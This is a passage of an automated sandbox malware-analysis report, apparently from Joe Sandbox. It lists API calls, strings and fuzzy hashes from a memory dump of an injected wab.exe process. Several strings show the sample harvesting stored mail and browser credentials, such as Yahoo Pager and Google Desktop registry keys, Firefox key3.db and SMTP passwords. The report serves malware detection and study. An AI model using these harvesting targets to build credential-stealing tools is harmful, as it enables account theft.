                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: CloseOpenQueryValuememset
                  • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                  • API String ID: 1830152886-1703613266
                  • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                  • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                  • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                  • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                  APIs
                  Strings
                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                  • unknown column "%s" in foreign key definition, xrefs: 00430C59
                  • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                  • API String ID: 3510742995-272990098
                  • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                  • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                  • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                  • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset
                  • String ID: H
                  • API String ID: 2221118986-2852464175
                  • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                  • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                  • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                  • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                  • API String ID: 3510742995-3170954634
                  • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                  • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                  • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                  • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcmp$memcpy
                  • String ID: @ $SQLite format 3
                  • API String ID: 231171946-3708268960
                  • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                  • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                  • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                  • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID: winWrite1$winWrite2
                  • API String ID: 438689982-3457389245
                  • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                  • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                  • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                  • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset
                  • String ID: winRead
                  • API String ID: 1297977491-2759563040
                  • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                  • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                  • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                  • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset
                  • String ID: gj
                  • API String ID: 1297977491-4203073231
                  • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                  • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                  • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                  • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                  APIs
                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                    • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                  • memset.MSVCRT ref: 0040AB9C
                    • Part of subcall function 00411004: memcpy.MSVCRT ref: 00411072
                    • Part of subcall function 0040A4E6: _mbscpy.MSVCRT ref: 0040A4EB
                    • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                  • sprintf.MSVCRT ref: 0040ABE1
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                  • String ID: <%s>%s</%s>$</item>$<item>
                  • API String ID: 3337535707-2769808009
                  • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                  • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                  • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                  • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                  APIs
                  • GetParent.USER32(?), ref: 004090C2
                  • GetWindowRect.USER32(?,?), ref: 004090CF
                  • GetClientRect.USER32(00000000,?), ref: 004090DA
                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$Rect$ClientParentPoints
                  • String ID:
                  • API String ID: 4247780290-0
                  • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                  • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                  • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                  • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                  APIs
                  • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                    • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                    • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                  • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                    • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                    • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                    • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                    • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                  • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                  • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                  • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                  • String ID:
                  • API String ID: 2374668499-0
                  • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                  • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                  • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                  • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: c45a219b033b3f4569339e018fe7ecbbef235cfad79d4e0063602ba8b31e0023
                  • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                  • Opcode Fuzzy Hash: c45a219b033b3f4569339e018fe7ecbbef235cfad79d4e0063602ba8b31e0023
                  • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                  APIs
                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A3E
                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A4C
                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A5D
                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A74
                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A7D
                  • ??3@YAXPAX@Z.MSVCRT ref: 00409AB3
                  • ??3@YAXPAX@Z.MSVCRT ref: 00409AC6
                  • ??3@YAXPAX@Z.MSVCRT ref: 00409AD9
                  • ??3@YAXPAX@Z.MSVCRT ref: 00409AEC
                  • ??3@YAXPAX@Z.MSVCRT ref: 00409B00
                    • Part of subcall function 00407A55: ??3@YAXPAX@Z.MSVCRT ref: 00407A5C
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: b0df650d73306e27691e5daf7003448de6eaa28b93c8488f2c6c21201bf7abc7
                  • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                  • Opcode Fuzzy Hash: b0df650d73306e27691e5daf7003448de6eaa28b93c8488f2c6c21201bf7abc7
                  • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                  APIs
                    • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                    • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                    • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                  • SetBkMode.GDI32(?,00000001), ref: 0041079E
                  • GetSysColor.USER32(00000005), ref: 004107A6
                  • SetBkColor.GDI32(?,00000000), ref: 004107B0
                  • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                  • GetSysColorBrush.USER32(00000005), ref: 004107C6
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Color$BrushClassModeNameText_strcmpimemset
                  • String ID:
                  • API String ID: 2775283111-0
                  • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                  • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                  • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                  • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: winSeekFile$winTruncate1$winTruncate2
                  • API String ID: 885266447-2471937615
                  • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                  • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                  • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                  • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                  APIs
                    • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                  • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                  • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                    • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT ref: 00407909
                    • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
                    • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$??2@??3@CloseCreateHandleReadSize
                  • String ID: Ul@$key3.db
                  • API String ID: 1968906679-1563549157
                  • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                  • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                  • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                  • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: _strcmpi$_mbscpy
                  • String ID: smtp
                  • API String ID: 2625860049-60245459
                  • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                  • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                  • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                  • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                  APIs
                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                  • memset.MSVCRT ref: 00408258
                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                  Strings
                  • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Close$EnumOpenmemset
                  • String ID: Software\Google\Google Desktop\Mailboxes
                  • API String ID: 2255314230-2212045309
                  • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                  • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                  • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                  • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                  APIs
                  • memset.MSVCRT ref: 0040C28C
                  • SetFocus.USER32(?,?), ref: 0040C314
                    • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: FocusMessagePostmemset
                  • String ID: S_@$l
                  • API String ID: 3436799508-4018740455
                  • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                  • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                  • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                  • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                  APIs
                  • memset.MSVCRT ref: 004092C0
                  • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                  • _mbscpy.MSVCRT ref: 004092FC
                  Strings
                  • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileString_mbscpymemset
                  • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                  • API String ID: 408644273-3424043681
                  • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                  • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                  • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                  • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscpy
                  • String ID: C^@$X$ini
                  • API String ID: 714388716-917056472
                  • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                  • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                  • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                  • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                  APIs
                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                  • CreateFontIndirectA.GDI32(?), ref: 0040101F
                  • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                  • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                  • String ID: MS Sans Serif
                  • API String ID: 3492281209-168460110
                  • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                  • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                  • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                  • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ClassName_strcmpimemset
                  • String ID: edit
                  • API String ID: 275601554-2167791130
                  • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                  • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                  • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                  • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: strlen$_mbscat
                  • String ID: 3CD
                  • API String ID: 3951308622-1938365332
                  • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                  • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                  • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                  • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscat$_mbscpy
                  • String ID: Password2
                  • API String ID: 2600922555-1856559283
                  • Opcode ID: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                  • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                  • Opcode Fuzzy Hash: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                  • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset
                  • String ID: rows deleted
                  • API String ID: 2221118986-571615504
                  • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                  • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                  • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                  • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memcmp
                  • String ID:
                  • API String ID: 3384217055-0
                  • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                  • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                  • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                  • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$memset
                  • String ID:
                  • API String ID: 1860491036-0
                  • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                  • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                  • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                  • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                  APIs
                  Memory Dump Source
